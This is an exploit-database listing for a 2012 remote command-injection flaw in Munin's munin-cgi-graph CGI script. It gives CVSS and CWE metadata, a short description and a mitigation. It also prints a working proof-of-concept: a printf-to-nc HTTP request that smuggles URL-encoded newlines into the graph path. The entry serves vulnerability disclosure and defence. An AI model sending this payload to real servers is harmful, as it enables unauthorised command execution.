header-logo
Suggest Exploit
vendor:
Munin
by:
SecurityFocus
7,5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Munin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Munin Remote Command Injection Vulnerability

Munin is prone to a remote command-injection vulnerability. Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. An example exploit is provided in the description.

Mitigation:

Input validation should be used to prevent attackers from exploiting this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/53032/info

Munin is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. 

printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80

Navigation

Suggest Exploit

Services By CQR